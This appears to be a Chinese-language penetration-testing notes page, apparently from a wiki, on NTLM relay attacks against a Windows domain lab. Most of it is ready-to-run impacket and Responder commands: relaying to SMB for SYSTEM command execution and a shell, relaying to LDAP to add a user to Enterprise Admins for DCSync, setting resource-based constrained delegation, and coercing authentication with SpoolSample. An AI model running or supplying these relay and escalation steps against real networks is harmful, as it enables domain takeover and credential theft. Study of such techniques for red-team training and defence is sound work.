NTLM Relay

NTLM Relay to SMB执行命令

impacket下的smbrelayx.py
python3 smbrelayx.py -h 10.10.10.140 -c hostname
# 10.10.10.140是目标机fileserver，-c指定执行的命令

impacket下的ntlmrelayx.py
python3 ntlmrelayx.py -t smb://10.10.10.140 -c hostname -smb2support

Responder下的MultiRelay.py脚本,该脚本功能强大，通过ALL参数可以获得一个稳定的shell，还有抓密码等其他功能，在原目录执行，要根据要求按照环境
python3 MultiRelay.py -t 10.10.10.140 -u ALL
# 获取shell后执行hostname

浅析

这里使用ntlmrelayx，首先尝试各种服务权限

然后通过创建服务来执行命令，所以执行whoami为system

创建服务需要调用函数CreateService，而该函数默认是Administrators组才有的权限

NTLM Relay to LDAP

提升权限

如果NTLM发起用户在以下用户组

Enterprise admins
Domain admins
Built-in Administrators
Backup operators
Account operators

那么就可以将任意用户拉进该组，从而使该用户称为高权限用户

这里添加到了Enterprise admins组，然后使用dcsync成功

python3 ntlmrelayx.py -t ldap://10.10.10.139 --escalate-user fileserver -smb2support --remove-mic --no-dump

设置基于资源的约束委派

设置test$到fileserver$的基于资源的约束委派，设置好之后就是正常的基于资源的约束委派攻击来攻击fileserver机器

python3 ntlmrelayx.py -t ldap://10.10.10.139 --delegate-access --escalate-user test\$ --remove-mic --no-dump -smb2support
# 10.10.10.139为域控机器

强制fileserver$访问攻击机

spoolsample.exe fileserver 10.10.10.10

成功后查询属性

Get-DomainComputer fileserver -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

PreviousSeImpersonatePrivileget模拟提权 Next权限维持

Last updated 2 years ago

hashtagNTLM Relay to SMB执行命令

hashtag浅析

hashtagNTLM Relay to LDAP

hashtag提升权限

hashtag设置基于资源的约束委派

NTLM Relay to SMB执行命令

浅析

NTLM Relay to LDAP

提升权限

设置基于资源的约束委派